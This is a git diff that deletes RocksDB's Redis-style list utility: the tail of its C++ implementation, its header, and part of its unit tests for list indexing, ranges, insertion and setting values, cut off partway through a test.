-//  Invalid indices will not generate an error, just empty,
-//  or the portion of the list that fits in this interval
-//   : throws RedisListException
-bool RedisLists::Trim(const std::string& key, int32_t start, int32_t stop) {
-  // Get the original list data
-  std::string data;
-  db_->Get(get_option_, key, &data);
-
-  // Handle negative indices in REDIS
-  int listLen = Length(key);
-  if (start < 0) {
-    start = listLen - (-start);
-  }
-  if (stop < 0) {
-    stop = listLen - (-stop);
-  }
-
-  // Truncate bounds to only fit in the list
-  start = std::max(start, 0);
-  stop = std::min(stop, listLen-1);
-
-  // Construct an iterator for the list. Drop all undesired elements.
-  int curIndex = 0;
-  RedisListIterator it(data);
-  it.Reserve(it.Size());          // Over-estimate
-  while(!it.Done()) {
-    // If not within the range, just skip the item (drop it).
-    // Otherwise, continue as usual.
-    if (start <= curIndex && curIndex <= stop) {
-      it.Push();
-    } else {
-      it.Skip();
-    }
-
-    // Increment the current index
-    ++curIndex;
-  }
-
-  // Write the (possibly empty) result to the database
-  Status s = db_->Put(put_option_, key, it.WriteResult());
-
-  // Return true as long as the write succeeded
-  return s.ok();
-}
-
-// Return and remove the first element in the list (or "" if empty)
-//   : throws RedisListException
-bool RedisLists::PopLeft(const std::string& key, std::string* result) {
-  // Get the original list data
-  std::string data;
-  db_->Get(get_option_, key, &data);
-
-  // Point to first element in the list (if it exists), and get its value/size
-  RedisListIterator it(data);
-  if (it.Length() > 0) {            // Proceed only if list is non-empty
-    Slice elem;
-    it.GetCurrent(&elem);           // Store the value of the first element
-    it.Reserve(it.Size() - it.SizeOf(elem));
-    it.Skip();                      // DROP the first item and move to next
-
-    // Update the db
-    db_->Put(put_option_, key, it.WriteResult());
-
-    // Return the value
-    if (result != NULL) {
-      *result = elem.ToString();
-    }
-    return true;
-  } else {
-    return false;
-  }
-}
-
-// Remove and return the last element in the list (or "" if empty)
-// TODO: Make this O(1). Might require MergeOperator.
-//   : throws RedisListException
-bool RedisLists::PopRight(const std::string& key, std::string* result) {
-  // Extract the original list data
-  std::string data;
-  db_->Get(get_option_, key, &data);
-
-  // Construct an iterator to the data and move to last element
-  RedisListIterator it(data);
-  it.Reserve(it.Size());
-  int len = it.Length();
-  int curIndex = 0;
-  while(curIndex < (len-1) && !it.Done()) {
-    it.Push();
-    ++curIndex;
-  }
-
-  // Extract and drop/skip the last element
-  if (curIndex == len-1) {
-    assert(!it.Done());         // Sanity check. Should not have ended here.
-
-    // Extract and pop the element
-    Slice elem;
-    it.GetCurrent(&elem);       // Save value of element.
-    it.Skip();                  // Skip the element
-
-    // Write the result to the database
-    db_->Put(put_option_, key, it.WriteResult());
-
-    // Return the value
-    if (result != NULL) {
-      *result = elem.ToString();
-    }
-    return true;
-  } else {
-    // Must have been an empty list
-    assert(it.Done() && len==0 && curIndex == 0);
-    return false;
-  }
-}
-
-// Remove the (first or last) "num" occurrences of value in (list: key)
-//   : throws RedisListException
-int RedisLists::Remove(const std::string& key, int32_t num,
-                       const std::string& value) {
-  // Negative num ==> RemoveLast; Positive num ==> Remove First
-  if (num < 0) {
-    return RemoveLast(key, -num, value);
-  } else if (num > 0) {
-    return RemoveFirst(key, num, value);
-  } else {
-    return RemoveFirst(key, Length(key), value);
-  }
-}
-
-// Remove the first "num" occurrences of value in (list: key).
-//   : throws RedisListException
-int RedisLists::RemoveFirst(const std::string& key, int32_t num,
-                            const std::string& value) {
-  // Ensure that the number is positive
-  assert(num >= 0);
-
-  // Extract the original list data
-  std::string data;
-  db_->Get(get_option_, key, &data);
-
-  // Traverse the list, appending all but the desired occurrences of value
-  int numSkipped = 0;         // Keep track of the number of times value is seen
-  Slice elem;
-  RedisListIterator it(data);
-  it.Reserve(it.Size());
-  while (!it.Done()) {
-    it.GetCurrent(&elem);
-
-    if (elem == value && numSkipped < num) {
-      // Drop this item if desired
-      it.Skip();
-      ++numSkipped;
-    } else {
-      // Otherwise keep the item and proceed as normal
-      it.Push();
-    }
-  }
-
-  // Put the result back to the database
-  db_->Put(put_option_, key, it.WriteResult());
-
-  // Return the number of elements removed
-  return numSkipped;
-}
-
-
-// Remove the last "num" occurrences of value in (list: key).
-// TODO: I traverse the list 2x. Make faster. Might require MergeOperator.
-//   : throws RedisListException
-int RedisLists::RemoveLast(const std::string& key, int32_t num,
-                           const std::string& value) {
-  // Ensure that the number is positive
-  assert(num >= 0);
-
-  // Extract the original list data
-  std::string data;
-  db_->Get(get_option_, key, &data);
-
-  // Temporary variable to hold the "current element" in the blocks below
-  Slice elem;
-
-  // Count the total number of occurrences of value
-  int totalOccs = 0;
-  for (RedisListIterator it(data); !it.Done(); it.Skip()) {
-    it.GetCurrent(&elem);
-    if (elem == value) {
-      ++totalOccs;
-    }
-  }
-
-  // Construct an iterator to the data. Reserve enough space for the result.
-  RedisListIterator it(data);
-  int bytesRemoved = std::min(num,totalOccs)*it.SizeOf(value);
-  it.Reserve(it.Size() - bytesRemoved);
-
-  // Traverse the list, appending all but the desired occurrences of value.
-  // Note: "Drop the last k occurrences" is equivalent to
-  //  "keep only the first n-k occurrences", where n is total occurrences.
-  int numKept = 0;          // Keep track of the number of times value is kept
-  while(!it.Done()) {
-    it.GetCurrent(&elem);
-
-    // If we are within the deletion range and equal to value, drop it.
-    // Otherwise, append/keep/push it.
-    if (elem == value) {
-      if (numKept < totalOccs - num) {
-        it.Push();
-        ++numKept;
-      } else {
-        it.Skip();
-      }
-    } else {
-      // Always append the others
-      it.Push();
-    }
-  }
-
-  // Put the result back to the database
-  db_->Put(put_option_, key, it.WriteResult());
-
-  // Return the number of elements removed
-  return totalOccs - numKept;
-}
-
-/// Private functions
-
-// Insert element value into (list: key), right before/after
-//  the first occurrence of pivot
-//   : throws RedisListException
-int RedisLists::Insert(const std::string& key, const std::string& pivot,
-                       const std::string& value, bool insert_after) {
-  // Get the original list data
-  std::string data;
-  db_->Get(get_option_, key, &data);
-
-  // Construct an iterator to the data and reserve enough space for result.
-  RedisListIterator it(data);
-  it.Reserve(it.Size() + it.SizeOf(value));
-
-  // Iterate through the list until we find the element we want
-  Slice elem;
-  bool found = false;
-  while(!it.Done() && !found) {
-    it.GetCurrent(&elem);
-
-    // When we find the element, insert the element and mark found
-    if (elem == pivot) {                // Found it!
-      found = true;
-      if (insert_after == true) {       // Skip one more, if inserting after it
-        it.Push();
-      }
-      it.InsertElement(value);
-    } else {
-      it.Push();
-    }
-
-  }
-
-  // Put the data (string) into the database
-  if (found) {
-    db_->Put(put_option_, key, it.WriteResult());
-  }
-
-  // Returns the new (possibly unchanged) length of the list
-  return it.Length();
-}
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/redis/redis_lists.h b/thirdparty/rocksdb/utilities/redis/redis_lists.h
deleted file mode 100644
index 6c8b955..0000000
--- a/thirdparty/rocksdb/utilities/redis/redis_lists.h
+++ /dev/null
@@ -1,108 +0,0 @@
-/**
- * A (persistent) Redis API built using the rocksdb backend.
- * Implements Redis Lists as described on: http://redis.io/commands#list
- *
- * @throws All functions may throw a RedisListException
- *
- * @author Deon Nicholas (dnicholas@fb.com)
- * Copyright 2013 Facebook
- */
-
-#ifndef ROCKSDB_LITE
-#pragma once
-
-#include <string>
-#include "rocksdb/db.h"
-#include "redis_list_iterator.h"
-#include "redis_list_exception.h"
-
-namespace rocksdb {
-
-/// The Redis functionality (see http://redis.io/commands#list)
-/// All functions may THROW a RedisListException
-class RedisLists {
- public: // Constructors / Destructors
-  /// Construct a new RedisLists database, with name/path of db.
-  /// Will clear the database on open iff destructive is true (default false).
-  /// Otherwise, it will restore saved changes.
-  /// May throw RedisListException
-  RedisLists(const std::string& db_path,
-             Options options, bool destructive = false);
-
- public:  // Accessors
-  /// The number of items in (list: key)
-  int Length(const std::string& key);
-
-  /// Search the list for the (index)'th item (0-based) in (list:key)
-  /// A negative index indicates: "from end-of-list"
-  /// If index is within range: return true, and return the value in *result.
-  /// If (index < -length OR index>=length), then index is out of range:
-  ///   return false (and *result is left unchanged)
-  /// May throw RedisListException
-  bool Index(const std::string& key, int32_t index,
-             std::string* result);
-
-  /// Return (list: key)[first..last] (inclusive)
-  /// May throw RedisListException
-  std::vector<std::string> Range(const std::string& key,
-                                 int32_t first, int32_t last);
-
-  /// Prints the entire (list: key), for debugging.
-  void Print(const std::string& key);
-
- public: // Insert/Update
-  /// Insert value before/after pivot in (list: key). Return the length.
-  /// May throw RedisListException
-  int InsertBefore(const std::string& key, const std::string& pivot,
-                   const std::string& value);
-  int InsertAfter(const std::string& key, const std::string& pivot,
-                  const std::string& value);
-
-  /// Push / Insert value at beginning/end of the list. Return the length.
-  /// May throw RedisListException
-  int PushLeft(const std::string& key, const std::string& value);
-  int PushRight(const std::string& key, const std::string& value);
-
-  /// Set (list: key)[idx] = val. Return true on success, false on fail
-  /// May throw RedisListException
-  bool Set(const std::string& key, int32_t index, const std::string& value);
-
- public: // Delete / Remove / Pop / Trim
-  /// Trim (list: key) so that it will only contain the indices from start..stop
-  /// Returns true on success
-  /// May throw RedisListException
-  bool Trim(const std::string& key, int32_t start, int32_t stop);
-
-  /// If list is empty, return false and leave *result unchanged.
-  /// Else, remove the first/last elem, store it in *result, and return true
-  bool PopLeft(const std::string& key, std::string* result);  // First
-  bool PopRight(const std::string& key, std::string* result); // Last
-
-  /// Remove the first (or last) num occurrences of value from the list (key)
-  /// Return the number of elements removed.
-  /// May throw RedisListException
-  int Remove(const std::string& key, int32_t num,
-             const std::string& value);
-  int RemoveFirst(const std::string& key, int32_t num,
-                  const std::string& value);
-  int RemoveLast(const std::string& key, int32_t num,
-                 const std::string& value);
-
- private: // Private Functions
-  /// Calls InsertBefore or InsertAfter
-  int Insert(const std::string& key, const std::string& pivot,
-             const std::string& value, bool insert_after);
- private:
-  std::string db_name_;       // The actual database name/path
-  WriteOptions put_option_;
-  ReadOptions get_option_;
-
-  /// The backend rocksdb database.
-  /// Map : key --> list
-  ///       where a list is a sequence of elements
-  ///       and an element is a 4-byte integer (n), followed by n bytes of data
-  std::unique_ptr<DB> db_;
-};
-
-} // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/redis/redis_lists_test.cc b/thirdparty/rocksdb/utilities/redis/redis_lists_test.cc
deleted file mode 100644
index 22acdff..0000000
--- a/thirdparty/rocksdb/utilities/redis/redis_lists_test.cc
+++ /dev/null
@@ -1,894 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-/**
- * A test harness for the Redis API built on rocksdb.
- *
- * USAGE: Build with: "make redis_test" (in rocksdb directory).
- *        Run unit tests with: "./redis_test"
- *        Manual/Interactive user testing: "./redis_test -m"
- *        Manual user testing + restart database: "./redis_test -m -d"
- *
- * TODO:  Add LARGE random test cases to verify efficiency and scalability
- *
- * @author Deon Nicholas (dnicholas@fb.com)
- */
-
-#ifndef ROCKSDB_LITE
-
-#include <iostream>
-#include <cctype>
-
-#include "redis_lists.h"
-#include "util/testharness.h"
-#include "util/random.h"
-
-using namespace rocksdb;
-
-namespace rocksdb {
-
-class RedisListsTest : public testing::Test {
- public:
-  static const std::string kDefaultDbName;
-  static Options options;
-
-  RedisListsTest() {
-    options.create_if_missing = true;
-  }
-};
-
-const std::string RedisListsTest::kDefaultDbName =
-    test::TmpDir() + "/redis_lists_test";
-Options RedisListsTest::options = Options();
-
-// operator== and operator<< are defined below for vectors (lists)
-// Needed for ASSERT_EQ
-
-namespace {
-void AssertListEq(const std::vector<std::string>& result,
-                  const std::vector<std::string>& expected_result) {
-  ASSERT_EQ(result.size(), expected_result.size());
-  for (size_t i = 0; i < result.size(); ++i) {
-    ASSERT_EQ(result[i], expected_result[i]);
-  }
-}
-}  // namespace
-
-// PushRight, Length, Index, Range
-TEST_F(RedisListsTest, SimpleTest) {
-  RedisLists redis(kDefaultDbName, options, true);   // Destructive
-
-  std::string tempv;  // Used below for all Index(), PopRight(), PopLeft()
-
-  // Simple PushRight (should return the new length each time)
-  ASSERT_EQ(redis.PushRight("k1", "v1"), 1);
-  ASSERT_EQ(redis.PushRight("k1", "v2"), 2);
-  ASSERT_EQ(redis.PushRight("k1", "v3"), 3);
-
-  // Check Length and Index() functions
-  ASSERT_EQ(redis.Length("k1"), 3);        // Check length
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "v1");   // Check valid indices
-  ASSERT_TRUE(redis.Index("k1", 1, &tempv));
-  ASSERT_EQ(tempv, "v2");
-  ASSERT_TRUE(redis.Index("k1", 2, &tempv));
-  ASSERT_EQ(tempv, "v3");
-
-  // Check range function and vectors
-  std::vector<std::string> result = redis.Range("k1", 0, 2);   // Get the list
-  std::vector<std::string> expected_result(3);
-  expected_result[0] = "v1";
-  expected_result[1] = "v2";
-  expected_result[2] = "v3";
-  AssertListEq(result, expected_result);
-}
-
-// PushLeft, Length, Index, Range
-TEST_F(RedisListsTest, SimpleTest2) {
-  RedisLists redis(kDefaultDbName, options, true);   // Destructive
-
-  std::string tempv;  // Used below for all Index(), PopRight(), PopLeft()
-
-  // Simple PushRight
-  ASSERT_EQ(redis.PushLeft("k1", "v3"), 1);
-  ASSERT_EQ(redis.PushLeft("k1", "v2"), 2);
-  ASSERT_EQ(redis.PushLeft("k1", "v1"), 3);
-
-  // Check Length and Index() functions
-  ASSERT_EQ(redis.Length("k1"), 3);        // Check length
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "v1");   // Check valid indices
-  ASSERT_TRUE(redis.Index("k1", 1, &tempv));
-  ASSERT_EQ(tempv, "v2");
-  ASSERT_TRUE(redis.Index("k1", 2, &tempv));
-  ASSERT_EQ(tempv, "v3");
-
-  // Check range function and vectors
-  std::vector<std::string> result = redis.Range("k1", 0, 2);   // Get the list
-  std::vector<std::string> expected_result(3);
-  expected_result[0] = "v1";
-  expected_result[1] = "v2";
-  expected_result[2] = "v3";
-  AssertListEq(result, expected_result);
-}
-
-// Exhaustive test of the Index() function
-TEST_F(RedisListsTest, IndexTest) {
-  RedisLists redis(kDefaultDbName, options, true);   // Destructive
-
-  std::string tempv;  // Used below for all Index(), PopRight(), PopLeft()
-
-  // Empty Index check (return empty and should not crash or edit tempv)
-  tempv = "yo";
-  ASSERT_TRUE(!redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "yo");
-  ASSERT_TRUE(!redis.Index("fda", 3, &tempv));
-  ASSERT_EQ(tempv, "yo");
-  ASSERT_TRUE(!redis.Index("random", -12391, &tempv));
-  ASSERT_EQ(tempv, "yo");
-
-  // Simple Pushes (will yield: [v6, v4, v4, v1, v2, v3]
-  redis.PushRight("k1", "v1");
-  redis.PushRight("k1", "v2");
-  redis.PushRight("k1", "v3");
-  redis.PushLeft("k1", "v4");
-  redis.PushLeft("k1", "v4");
-  redis.PushLeft("k1", "v6");
-
-  // Simple, non-negative indices
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "v6");
-  ASSERT_TRUE(redis.Index("k1", 1, &tempv));
-  ASSERT_EQ(tempv, "v4");
-  ASSERT_TRUE(redis.Index("k1", 2, &tempv));
-  ASSERT_EQ(tempv, "v4");
-  ASSERT_TRUE(redis.Index("k1", 3, &tempv));
-  ASSERT_EQ(tempv, "v1");
-  ASSERT_TRUE(redis.Index("k1", 4, &tempv));
-  ASSERT_EQ(tempv, "v2");
-  ASSERT_TRUE(redis.Index("k1", 5, &tempv));
-  ASSERT_EQ(tempv, "v3");
-
-  // Negative indices
-  ASSERT_TRUE(redis.Index("k1", -6, &tempv));
-  ASSERT_EQ(tempv, "v6");
-  ASSERT_TRUE(redis.Index("k1", -5, &tempv));
-  ASSERT_EQ(tempv, "v4");
-  ASSERT_TRUE(redis.Index("k1", -4, &tempv));
-  ASSERT_EQ(tempv, "v4");
-  ASSERT_TRUE(redis.Index("k1", -3, &tempv));
-  ASSERT_EQ(tempv, "v1");
-  ASSERT_TRUE(redis.Index("k1", -2, &tempv));
-  ASSERT_EQ(tempv, "v2");
-  ASSERT_TRUE(redis.Index("k1", -1, &tempv));
-  ASSERT_EQ(tempv, "v3");
-
-  // Out of bounds (return empty, no crash)
-  ASSERT_TRUE(!redis.Index("k1", 6, &tempv));
-  ASSERT_TRUE(!redis.Index("k1", 123219, &tempv));
-  ASSERT_TRUE(!redis.Index("k1", -7, &tempv));
-  ASSERT_TRUE(!redis.Index("k1", -129, &tempv));
-}
-
-
-// Exhaustive test of the Range() function
-TEST_F(RedisListsTest, RangeTest) {
-  RedisLists redis(kDefaultDbName, options, true);   // Destructive
-
-  std::string tempv;  // Used below for all Index(), PopRight(), PopLeft()
-
-  // Simple Pushes (will yield: [v6, v4, v4, v1, v2, v3])
-  redis.PushRight("k1", "v1");
-  redis.PushRight("k1", "v2");
-  redis.PushRight("k1", "v3");
-  redis.PushLeft("k1", "v4");
-  redis.PushLeft("k1", "v4");
-  redis.PushLeft("k1", "v6");
-
-  // Sanity check (check the length;  make sure it's 6)
-  ASSERT_EQ(redis.Length("k1"), 6);
-
-  // Simple range
-  std::vector<std::string> res = redis.Range("k1", 1, 4);
-  ASSERT_EQ((int)res.size(), 4);
-  ASSERT_EQ(res[0], "v4");
-  ASSERT_EQ(res[1], "v4");
-  ASSERT_EQ(res[2], "v1");
-  ASSERT_EQ(res[3], "v2");
-
-  // Negative indices (i.e.: measured from the end)
-  res = redis.Range("k1", 2, -1);
-  ASSERT_EQ((int)res.size(), 4);
-  ASSERT_EQ(res[0], "v4");
-  ASSERT_EQ(res[1], "v1");
-  ASSERT_EQ(res[2], "v2");
-  ASSERT_EQ(res[3], "v3");
-
-  res = redis.Range("k1", -6, -4);
-  ASSERT_EQ((int)res.size(), 3);
-  ASSERT_EQ(res[0], "v6");
-  ASSERT_EQ(res[1], "v4");
-  ASSERT_EQ(res[2], "v4");
-
-  res = redis.Range("k1", -1, 5);
-  ASSERT_EQ((int)res.size(), 1);
-  ASSERT_EQ(res[0], "v3");
-
-  // Partial / Broken indices
-  res = redis.Range("k1", -3, 1000000);
-  ASSERT_EQ((int)res.size(), 3);
-  ASSERT_EQ(res[0], "v1");
-  ASSERT_EQ(res[1], "v2");
-  ASSERT_EQ(res[2], "v3");
-
-  res = redis.Range("k1", -1000000, 1);
-  ASSERT_EQ((int)res.size(), 2);
-  ASSERT_EQ(res[0], "v6");
-  ASSERT_EQ(res[1], "v4");
-
-  // Invalid indices
-  res = redis.Range("k1", 7, 9);
-  ASSERT_EQ((int)res.size(), 0);
-
-  res = redis.Range("k1", -8, -7);
-  ASSERT_EQ((int)res.size(), 0);
-
-  res = redis.Range("k1", 3, 2);
-  ASSERT_EQ((int)res.size(), 0);
-
-  res = redis.Range("k1", 5, -2);
-  ASSERT_EQ((int)res.size(), 0);
-
-  // Range matches Index
-  res = redis.Range("k1", -6, -4);
-  ASSERT_TRUE(redis.Index("k1", -6, &tempv));
-  ASSERT_EQ(tempv, res[0]);
-  ASSERT_TRUE(redis.Index("k1", -5, &tempv));
-  ASSERT_EQ(tempv, res[1]);
-  ASSERT_TRUE(redis.Index("k1", -4, &tempv));
-  ASSERT_EQ(tempv, res[2]);
-
-  // Last check
-  res = redis.Range("k1", 0, -6);
-  ASSERT_EQ((int)res.size(), 1);
-  ASSERT_EQ(res[0], "v6");
-}
-
-// Exhaustive test for InsertBefore(), and InsertAfter()
-TEST_F(RedisListsTest, InsertTest) {
-  RedisLists redis(kDefaultDbName, options, true);
-
-  std::string tempv;  // Used below for all Index(), PopRight(), PopLeft()
-
-  // Insert on empty list (return 0, and do not crash)
-  ASSERT_EQ(redis.InsertBefore("k1", "non-exist", "a"), 0);
-  ASSERT_EQ(redis.InsertAfter("k1", "other-non-exist", "c"), 0);
-  ASSERT_EQ(redis.Length("k1"), 0);
-
-  // Push some preliminary stuff [g, f, e, d, c, b, a]
-  redis.PushLeft("k1", "a");
-  redis.PushLeft("k1", "b");
-  redis.PushLeft("k1", "c");
-  redis.PushLeft("k1", "d");
-  redis.PushLeft("k1", "e");
-  redis.PushLeft("k1", "f");
-  redis.PushLeft("k1", "g");
-  ASSERT_EQ(redis.Length("k1"), 7);
-
-  // Test InsertBefore
-  int newLength = redis.InsertBefore("k1", "e", "hello");
-  ASSERT_EQ(newLength, 8);
-  ASSERT_EQ(redis.Length("k1"), newLength);
-  ASSERT_TRUE(redis.Index("k1", 1, &tempv));
-  ASSERT_EQ(tempv, "f");
-  ASSERT_TRUE(redis.Index("k1", 3, &tempv));
-  ASSERT_EQ(tempv, "e");
-  ASSERT_TRUE(redis.Index("k1", 2, &tempv));
-  ASSERT_EQ(tempv, "hello");
-
-  // Test InsertAfter
-  newLength =  redis.InsertAfter("k1", "c", "bye");
-  ASSERT_EQ(newLength, 9);
-  ASSERT_EQ(redis.Length("k1"), newLength);
-  ASSERT_TRUE(redis.Index("k1", 6, &tempv));
-  ASSERT_EQ(tempv, "bye");
-
-  // Test bad value on InsertBefore
-  newLength = redis.InsertBefore("k1", "yo", "x");
-  ASSERT_EQ(newLength, 9);
-  ASSERT_EQ(redis.Length("k1"), newLength);
-
-  // Test bad value on InsertAfter
-  newLength = redis.InsertAfter("k1", "xxxx", "y");
-  ASSERT_EQ(newLength, 9);
-  ASSERT_EQ(redis.Length("k1"), newLength);
-
-  // Test InsertBefore beginning
-  newLength = redis.InsertBefore("k1", "g", "begggggggggggggggg");
-  ASSERT_EQ(newLength, 10);
-  ASSERT_EQ(redis.Length("k1"), newLength);
-
-  // Test InsertAfter end
-  newLength = redis.InsertAfter("k1", "a", "enddd");
-  ASSERT_EQ(newLength, 11);
-  ASSERT_EQ(redis.Length("k1"), newLength);
-
-  // Make sure nothing weird happened.
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "begggggggggggggggg");
-  ASSERT_TRUE(redis.Index("k1", 1, &tempv));
-  ASSERT_EQ(tempv, "g");
-  ASSERT_TRUE(redis.Index("k1", 2, &tempv));
-  ASSERT_EQ(tempv, "f");
-  ASSERT_TRUE(redis.Index("k1", 3, &tempv));
-  ASSERT_EQ(tempv, "hello");
-  ASSERT_TRUE(redis.Index("k1", 4, &tempv));
-  ASSERT_EQ(tempv, "e");
-  ASSERT_TRUE(redis.Index("k1", 5, &tempv));
-  ASSERT_EQ(tempv, "d");
-  ASSERT_TRUE(redis.Index("k1", 6, &tempv));
-  ASSERT_EQ(tempv, "c");
-  ASSERT_TRUE(redis.Index("k1", 7, &tempv));
-  ASSERT_EQ(tempv, "bye");
-  ASSERT_TRUE(redis.Index("k1", 8, &tempv));
-  ASSERT_EQ(tempv, "b");
-  ASSERT_TRUE(redis.Index("k1", 9, &tempv));
-  ASSERT_EQ(tempv, "a");
-  ASSERT_TRUE(redis.Index("k1", 10, &tempv));
-  ASSERT_EQ(tempv, "enddd");
-}
-
-// Exhaustive test of Set function
-TEST_F(RedisListsTest, SetTest) {
-  RedisLists redis(kDefaultDbName, options, true);
-
-  std::string tempv;  // Used below for all Index(), PopRight(), PopLeft()
-
-  // Set on empty list (return false, and do not crash)
-  ASSERT_EQ(redis.Set("k1", 7, "a"), false);
-  ASSERT_EQ(redis.Set("k1", 0, "a"), false);
-  ASSERT_EQ(redis.Set("k1", -49, "cx"), false);
-  ASSERT_EQ(redis.Length("k1"), 0);
-
-  // Push some preliminary stuff [g, f, e, d, c, b, a]
-  redis.PushLeft("k1", "a");
-  redis.PushLeft("k1", "b");
-  redis.PushLeft("k1", "c");
-  redis.PushLeft("k1", "d");
-  redis.PushLeft("k1", "e");
-  redis.PushLeft("k1", "f");
-  redis.PushLeft("k1", "g");
-  ASSERT_EQ(redis.Length("k1"), 7);
-
-  // Test Regular Set
-  ASSERT_TRUE(redis.Set("k1", 0, "0"));
-  ASSERT_TRUE(redis.Set("k1", 3, "3"));
-  ASSERT_TRUE(redis.Set("k1", 6, "6"));
-  ASSERT_TRUE(redis.Set("k1", 2, "2"));
-  ASSERT_TRUE(redis.Set("k1", 5, "5"));
-  ASSERT_TRUE(redis.Set("k1", 1, "1"));
-  ASSERT_TRUE(redis.Set("k1", 4, "4"));
-
-  ASSERT_EQ(redis.Length("k1"), 7); // Size should not change
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "0");
-  ASSERT_TRUE(redis.Index("k1", 1, &tempv));
-  ASSERT_EQ(tempv, "1");
-  ASSERT_TRUE(redis.Index("k1", 2, &tempv));
-  ASSERT_EQ(tempv, "2");
-  ASSERT_TRUE(redis.Index("k1", 3, &tempv));
-  ASSERT_EQ(tempv, "3");
-  ASSERT_TRUE(redis.Index("k1", 4, &tempv));
-  ASSERT_EQ(tempv, "4");
-  ASSERT_TRUE(redis.Index("k1", 5, &tempv));
-  ASSERT_EQ(tempv, "5");
-  ASSERT_TRUE(redis.Index("k1", 6, &tempv));
-  ASSERT_EQ(tempv, "6");
-
-  // Set with negative indices
-  ASSERT_TRUE(redis.Set("k1", -7, "a"));
-  ASSERT_TRUE(redis.Set("k1", -4, "d"));
-  ASSERT_TRUE(redis.Set("k1", -1, "g"));
-  ASSERT_TRUE(redis.Set("k1", -5, "c"));
-  ASSERT_TRUE(redis.Set("k1", -2, "f"));
-  ASSERT_TRUE(redis.Set("k1", -6, "b"));
-  ASSERT_TRUE(redis.Set("k1", -3, "e"));
-
-  ASSERT_EQ(redis.Length("k1"), 7); // Size should not change
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "a");
-  ASSERT_TRUE(redis.Index("k1", 1, &tempv));
-  ASSERT_EQ(tempv, "b");
-  ASSERT_TRUE(redis.Index("k1", 2, &tempv));
-  ASSERT_EQ(tempv, "c");
-  ASSERT_TRUE(redis.Index("k1", 3, &tempv));
-  ASSERT_EQ(tempv, "d");
-  ASSERT_TRUE(redis.Index("k1", 4, &tempv));
-  ASSERT_EQ(tempv, "e");
-  ASSERT_TRUE(redis.Index("k1", 5, &tempv));
-  ASSERT_EQ(tempv, "f");
-  ASSERT_TRUE(redis.Index("k1", 6, &tempv));
-  ASSERT_EQ(tempv, "g");
-
-  // Bad indices (just out-of-bounds / off-by-one check)
-  ASSERT_EQ(redis.Set("k1", -8, "off-by-one in negative index"), false);
-  ASSERT_EQ(redis.Set("k1", 7, "off-by-one-error in positive index"), false);
-  ASSERT_EQ(redis.Set("k1", 43892, "big random index should fail"), false);
-  ASSERT_EQ(redis.Set("k1", -21391, "large negative index should fail"), false);
-
-  // One last check (to make sure nothing weird happened)
-  ASSERT_EQ(redis.Length("k1"), 7); // Size should not change
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "a");
-  ASSERT_TRUE(redis.Index("k1", 1, &tempv));
-  ASSERT_EQ(tempv, "b");
-  ASSERT_TRUE(redis.Index("k1", 2, &tempv));
-  ASSERT_EQ(tempv, "c");
-  ASSERT_TRUE(redis.Index("k1", 3, &tempv));
-  ASSERT_EQ(tempv, "d");
-  ASSERT_TRUE(redis.Index("k1", 4, &tempv));
-  ASSERT_EQ(tempv, "e");
-  ASSERT_TRUE(redis.Index("k1", 5, &tempv));
-  ASSERT_EQ(tempv, "f");
-  ASSERT_TRUE(redis.Index("k1", 6, &tempv));
-  ASSERT_EQ(tempv, "g");
-}
-
-// Testing Insert, Push, and Set, in a mixed environment
-TEST_F(RedisListsTest, InsertPushSetTest) {
-  RedisLists redis(kDefaultDbName, options, true);   // Destructive
-
-  std::string tempv;  // Used below for all Index(), PopRight(), PopLeft()
-
-  // A series of pushes and insertions
-  // Will result in [newbegin, z, a, aftera, x, newend]
-  // Also, check the return value sometimes (should return length)
-  int lengthCheck;
-  lengthCheck = redis.PushLeft("k1", "a");
-  ASSERT_EQ(lengthCheck, 1);
-  redis.PushLeft("k1", "z");
-  redis.PushRight("k1", "x");
-  lengthCheck = redis.InsertAfter("k1", "a", "aftera");
-  ASSERT_EQ(lengthCheck , 4);
-  redis.InsertBefore("k1", "z", "newbegin");  // InsertBefore beginning of list
-  redis.InsertAfter("k1", "x", "newend");     // InsertAfter end of list
-
-  // Check
-  std::vector<std::string> res = redis.Range("k1", 0, -1); // Get the list
-  ASSERT_EQ((int)res.size(), 6);
-  ASSERT_EQ(res[0], "newbegin");
-  ASSERT_EQ(res[5], "newend");
-  ASSERT_EQ(res[3], "aftera");
-
-  // Testing duplicate values/pivots (multiple occurrences of 'a')
-  ASSERT_TRUE(redis.Set("k1", 0, "a"));     // [a, z, a, aftera, x, newend]
-  redis.InsertAfter("k1", "a", "happy");    // [a, happy, z, a, aftera, ...]
-  ASSERT_TRUE(redis.Index("k1", 1, &tempv));
-  ASSERT_EQ(tempv, "happy");
-  redis.InsertBefore("k1", "a", "sad");     // [sad, a, happy, z, a, aftera, ...]
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "sad");
-  ASSERT_TRUE(redis.Index("k1", 2, &tempv));
-  ASSERT_EQ(tempv, "happy");
-  ASSERT_TRUE(redis.Index("k1", 5, &tempv));
-  ASSERT_EQ(tempv, "aftera");
-  redis.InsertAfter("k1", "a", "zz");         // [sad, a, zz, happy, z, a, aftera, ...]
-  ASSERT_TRUE(redis.Index("k1", 2, &tempv));
-  ASSERT_EQ(tempv, "zz");
-  ASSERT_TRUE(redis.Index("k1", 6, &tempv));
-  ASSERT_EQ(tempv, "aftera");
-  ASSERT_TRUE(redis.Set("k1", 1, "nota"));    // [sad, nota, zz, happy, z, a, ...]
-  redis.InsertBefore("k1", "a", "ba");        // [sad, nota, zz, happy, z, ba, a, ...]
